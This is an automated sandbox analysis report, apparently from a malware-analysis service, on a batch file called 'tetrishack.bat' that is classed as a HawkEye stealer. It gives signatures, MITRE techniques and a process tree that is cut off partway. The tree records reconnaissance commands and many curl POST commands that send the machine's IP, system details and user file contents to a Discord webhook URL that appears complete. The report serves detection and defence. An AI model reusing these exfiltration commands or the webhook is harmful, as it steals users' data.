hawkeye | 1ec6ff53075f7232b5d9807e63b82e97a6c7a41bf77cd3b4e3813eefc4f97c50

Analysis

max time kernel
66s
max time network
65s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
23-02-2025 17:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tetrishack.bat
Size

1KB
MD5

729e4888ead4281eaa0644ee732b21e2
SHA1

f3425091a72fb93c0de2c8c0729530263c3a3f05
SHA256

1ec6ff53075f7232b5d9807e63b82e97a6c7a41bf77cd3b4e3813eefc4f97c50
SHA512

59f308be4061bce350e99f9f8bc7d7e9de0ff2a7a660845eaa71abf81a9928e98d78961290dc0fdac93acc913f4cd034488dbb4d5bea2b74cda6502f352d08bf

Score

10^/10

hawkeye keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Hawkeye family
hawkeye
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 51 IoCs

Web Service

T1102

flow	ioc
37	discord.com
43	discord.com
50	discord.com
54	discord.com
66	discord.com
74	discord.com
86	discord.com
94	discord.com
84	discord.com
97	discord.com
108	discord.com
109	discord.com
122	discord.com
124	discord.com
34	discord.com
40	discord.com
51	discord.com
67	discord.com
78	discord.com
79	discord.com
107	discord.com
110	discord.com
25	discord.com
27	discord.com
42	discord.com
57	discord.com
68	discord.com
116	discord.com
117	discord.com
45	discord.com
89	discord.com
16	discord.com
64	discord.com
69	discord.com
87	discord.com
11	discord.com
26	discord.com
32	discord.com
58	discord.com
88	discord.com
95	discord.com
96	discord.com
115	discord.com
33	discord.com
44	discord.com
56	discord.com
59	discord.com
76	discord.com
77	discord.com
99	discord.com
106	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ifconfig.me

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
1088	WMIC.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2248	timeout.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4196	whoami.exe
Token: SeIncreaseQuotaPrivilege	1088	WMIC.exe
Token: SeSecurityPrivilege	1088	WMIC.exe
Token: SeTakeOwnershipPrivilege	1088	WMIC.exe
Token: SeLoadDriverPrivilege	1088	WMIC.exe
Token: SeSystemProfilePrivilege	1088	WMIC.exe
Token: SeSystemtimePrivilege	1088	WMIC.exe
Token: SeProfSingleProcessPrivilege	1088	WMIC.exe
Token: SeIncBasePriorityPrivilege	1088	WMIC.exe
Token: SeCreatePagefilePrivilege	1088	WMIC.exe
Token: SeBackupPrivilege	1088	WMIC.exe
Token: SeRestorePrivilege	1088	WMIC.exe
Token: SeShutdownPrivilege	1088	WMIC.exe
Token: SeDebugPrivilege	1088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1088	WMIC.exe
Token: SeRemoteShutdownPrivilege	1088	WMIC.exe
Token: SeUndockPrivilege	1088	WMIC.exe
Token: SeManageVolumePrivilege	1088	WMIC.exe
Token: 33	1088	WMIC.exe
Token: 34	1088	WMIC.exe
Token: 35	1088	WMIC.exe
Token: 36	1088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1088	WMIC.exe
Token: SeSecurityPrivilege	1088	WMIC.exe
Token: SeTakeOwnershipPrivilege	1088	WMIC.exe
Token: SeLoadDriverPrivilege	1088	WMIC.exe
Token: SeSystemProfilePrivilege	1088	WMIC.exe
Token: SeSystemtimePrivilege	1088	WMIC.exe
Token: SeProfSingleProcessPrivilege	1088	WMIC.exe
Token: SeIncBasePriorityPrivilege	1088	WMIC.exe
Token: SeCreatePagefilePrivilege	1088	WMIC.exe
Token: SeBackupPrivilege	1088	WMIC.exe
Token: SeRestorePrivilege	1088	WMIC.exe
Token: SeShutdownPrivilege	1088	WMIC.exe
Token: SeDebugPrivilege	1088	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1088	WMIC.exe
Token: SeRemoteShutdownPrivilege	1088	WMIC.exe
Token: SeUndockPrivilege	1088	WMIC.exe
Token: SeManageVolumePrivilege	1088	WMIC.exe
Token: 33	1088	WMIC.exe
Token: 34	1088	WMIC.exe
Token: 35	1088	WMIC.exe
Token: 36	1088	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4900	WMIC.exe
Token: SeSecurityPrivilege	4900	WMIC.exe
Token: SeTakeOwnershipPrivilege	4900	WMIC.exe
Token: SeLoadDriverPrivilege	4900	WMIC.exe
Token: SeSystemProfilePrivilege	4900	WMIC.exe
Token: SeSystemtimePrivilege	4900	WMIC.exe
Token: SeProfSingleProcessPrivilege	4900	WMIC.exe
Token: SeIncBasePriorityPrivilege	4900	WMIC.exe
Token: SeCreatePagefilePrivilege	4900	WMIC.exe
Token: SeBackupPrivilege	4900	WMIC.exe
Token: SeRestorePrivilege	4900	WMIC.exe
Token: SeShutdownPrivilege	4900	WMIC.exe
Token: SeDebugPrivilege	4900	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4900	WMIC.exe
Token: SeRemoteShutdownPrivilege	4900	WMIC.exe
Token: SeUndockPrivilege	4900	WMIC.exe
Token: SeManageVolumePrivilege	4900	WMIC.exe
Token: 33	4900	WMIC.exe
Token: 34	4900	WMIC.exe
Token: 35	4900	WMIC.exe
Token: 36	4900	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 4196	2060	cmd.exe	81
PID 2060 wrote to memory of 4196	2060	cmd.exe	81
PID 2060 wrote to memory of 1620	2060	cmd.exe	82
PID 2060 wrote to memory of 1620	2060	cmd.exe	82
PID 2060 wrote to memory of 1088	2060	cmd.exe	83
PID 2060 wrote to memory of 1088	2060	cmd.exe	83
PID 2060 wrote to memory of 4900	2060	cmd.exe	85
PID 2060 wrote to memory of 4900	2060	cmd.exe	85
PID 2060 wrote to memory of 3720	2060	cmd.exe	86
PID 2060 wrote to memory of 3720	2060	cmd.exe	86
PID 2060 wrote to memory of 3068	2060	cmd.exe	87
PID 2060 wrote to memory of 3068	2060	cmd.exe	87
PID 2060 wrote to memory of 5004	2060	cmd.exe	88
PID 2060 wrote to memory of 5004	2060	cmd.exe	88
PID 2060 wrote to memory of 2248	2060	cmd.exe	90
PID 2060 wrote to memory of 2248	2060	cmd.exe	90
PID 2060 wrote to memory of 2244	2060	cmd.exe	92
PID 2060 wrote to memory of 2244	2060	cmd.exe	92
PID 2060 wrote to memory of 2984	2060	cmd.exe	93
PID 2060 wrote to memory of 2984	2060	cmd.exe	93
PID 2060 wrote to memory of 3924	2060	cmd.exe	94
PID 2060 wrote to memory of 3924	2060	cmd.exe	94
PID 2060 wrote to memory of 3592	2060	cmd.exe	96
PID 2060 wrote to memory of 3592	2060	cmd.exe	96
PID 2060 wrote to memory of 3556	2060	cmd.exe	97
PID 2060 wrote to memory of 3556	2060	cmd.exe	97
PID 2060 wrote to memory of 1596	2060	cmd.exe	99
PID 2060 wrote to memory of 1596	2060	cmd.exe	99
PID 2060 wrote to memory of 424	2060	cmd.exe	100
PID 2060 wrote to memory of 424	2060	cmd.exe	100
PID 2060 wrote to memory of 2784	2060	cmd.exe	102
PID 2060 wrote to memory of 2784	2060	cmd.exe	102
PID 2060 wrote to memory of 4432	2060	cmd.exe	103
PID 2060 wrote to memory of 4432	2060	cmd.exe	103
PID 2060 wrote to memory of 4968	2060	cmd.exe	104
PID 2060 wrote to memory of 4968	2060	cmd.exe	104
PID 2060 wrote to memory of 4956	2060	cmd.exe	106
PID 2060 wrote to memory of 4956	2060	cmd.exe	106
PID 2060 wrote to memory of 2112	2060	cmd.exe	107
PID 2060 wrote to memory of 2112	2060	cmd.exe	107
PID 2060 wrote to memory of 4336	2060	cmd.exe	108
PID 2060 wrote to memory of 4336	2060	cmd.exe	108
PID 2060 wrote to memory of 3748	2060	cmd.exe	109
PID 2060 wrote to memory of 3748	2060	cmd.exe	109
PID 2060 wrote to memory of 4704	2060	cmd.exe	110
PID 2060 wrote to memory of 4704	2060	cmd.exe	110
PID 2060 wrote to memory of 4772	2060	cmd.exe	111
PID 2060 wrote to memory of 4772	2060	cmd.exe	111
PID 2060 wrote to memory of 2808	2060	cmd.exe	112
PID 2060 wrote to memory of 2808	2060	cmd.exe	112
PID 2060 wrote to memory of 2484	2060	cmd.exe	113
PID 2060 wrote to memory of 2484	2060	cmd.exe	113
PID 2060 wrote to memory of 2836	2060	cmd.exe	114
PID 2060 wrote to memory of 2836	2060	cmd.exe	114
PID 2060 wrote to memory of 1364	2060	cmd.exe	115
PID 2060 wrote to memory of 1364	2060	cmd.exe	115
PID 2060 wrote to memory of 3004	2060	cmd.exe	116
PID 2060 wrote to memory of 3004	2060	cmd.exe	116
PID 2060 wrote to memory of 4508	2060	cmd.exe	117
PID 2060 wrote to memory of 4508	2060	cmd.exe	117
PID 2060 wrote to memory of 4316	2060	cmd.exe	118
PID 2060 wrote to memory of 4316	2060	cmd.exe	118
PID 2060 wrote to memory of 4900	2060	cmd.exe	119
PID 2060 wrote to memory of 4900	2060	cmd.exe	119

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tetrishack.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\system32\whoami.exe
  whoami
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4196
- C:\Windows\system32\curl.exe
  curl -s ifconfig.me
  2⤵
  PID:1620
- C:\Windows\System32\Wbem\WMIC.exe
  wmic logicaldisk get caption
  2⤵
  - Collects information from the system
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\System32\Wbem\WMIC.exe
  wmic cpu get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Windows\System32\Wbem\WMIC.exe
  wmic memorychip get capacity
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt"
  2⤵
  PID:3068
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"jmsglqko\admin\nIP: \n212.102.63.147Drives: \nCN\nMicrosoft Windows [Version 10.0.22000.493]\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:5004
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir /b /s /a-d "C:\Users\Admin\*.txt" 2>nul
  2⤵
  PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"
  2⤵
  PID:2984
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt\n403\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"
  2⤵
  PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"
  2⤵
  PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_February_17_2025__9_9_6.txt"
  2⤵
  PID:1596
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_February_17_2025__9_9_6.txt\n[000:00:00:000][P][TimerTask][0x00000a9c] TimerTask::Run has been invoked.\n[000:00:00:000][P][BackgroundTaskManager][0x00000a9c] BroadcastBackgroundTask: Broadcast background task already registered.\n[000:00:00:000][P][TimerTask][0x00000a9c] TimerTask: Unregistering timer task\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bbfe6957-7dc0-48b2-8e9d-a069d558ee0c}\0.0.filtertrie.intermediate.txt"
  2⤵
  PID:2784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bbfe6957-7dc0-48b2-8e9d-a069d558ee0c}\0.1.filtertrie.intermediate.txt"
  2⤵
  PID:4432
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bbfe6957-7dc0-48b2-8e9d-a069d558ee0c}\0.1.filtertrie.intermediate.txt\n0 1\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bbfe6957-7dc0-48b2-8e9d-a069d558ee0c}\0.2.filtertrie.intermediate.txt"
  2⤵
  PID:4956
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{bbfe6957-7dc0-48b2-8e9d-a069d558ee0c}\0.2.filtertrie.intermediate.txt\n0 2\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c00a0acc-66b9-4647-b210-26bec543c4de}\0.0.filtertrie.intermediate.txt"
  2⤵
  PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c00a0acc-66b9-4647-b210-26bec543c4de}\0.1.filtertrie.intermediate.txt"
  2⤵
  PID:3748
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c00a0acc-66b9-4647-b210-26bec543c4de}\0.1.filtertrie.intermediate.txt\n0 1\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c00a0acc-66b9-4647-b210-26bec543c4de}\0.2.filtertrie.intermediate.txt"
  2⤵
  PID:4772
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c00a0acc-66b9-4647-b210-26bec543c4de}\0.2.filtertrie.intermediate.txt\n0 2\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\appsconversions.txt"
  2⤵
  PID:2484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\appsglobals.txt"
  2⤵
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\appssynonyms.txt"
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\settingsconversions.txt"
  2⤵
  PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\settingsglobals.txt"
  2⤵
  PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{d0c2a7e1-f03e-4a1a-bfe7-50a30fd6062e}\settingssynonyms.txt"
  2⤵
  PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fcbaf0a-4044-494d-a5a6-a830ab98b7f9}\0.0.filtertrie.intermediate.txt"
  2⤵
  PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fcbaf0a-4044-494d-a5a6-a830ab98b7f9}\0.1.filtertrie.intermediate.txt"
  2⤵
  PID:3232
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fcbaf0a-4044-494d-a5a6-a830ab98b7f9}\0.1.filtertrie.intermediate.txt\n0 1\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fcbaf0a-4044-494d-a5a6-a830ab98b7f9}\0.2.filtertrie.intermediate.txt"
  2⤵
  PID:2096
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{7fcbaf0a-4044-494d-a5a6-a830ab98b7f9}\0.2.filtertrie.intermediate.txt\n0 2\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842974165177809.txt"
  2⤵
  PID:2384
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842974165177809.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975566069334.txt"
  2⤵
  PID:3244
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975566069334.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975579779137.txt"
  2⤵
  PID:4932
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975579779137.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975589692483.txt"
  2⤵
  PID:4892
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975589692483.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975594936980.txt"
  2⤵
  PID:2540
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975594936980.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975605545763.txt"
  2⤵
  PID:1276
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975605545763.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975613541123.txt"
  2⤵
  PID:4332
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975613541123.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975620378963.txt"
  2⤵
  PID:2444
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975620378963.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975634370263.txt"
  2⤵
  PID:3728
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975634370263.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975642867720.txt"
  2⤵
  PID:4612
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975642867720.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975651192936.txt"
  2⤵
  PID:2436
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975651192936.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975659895321.txt"
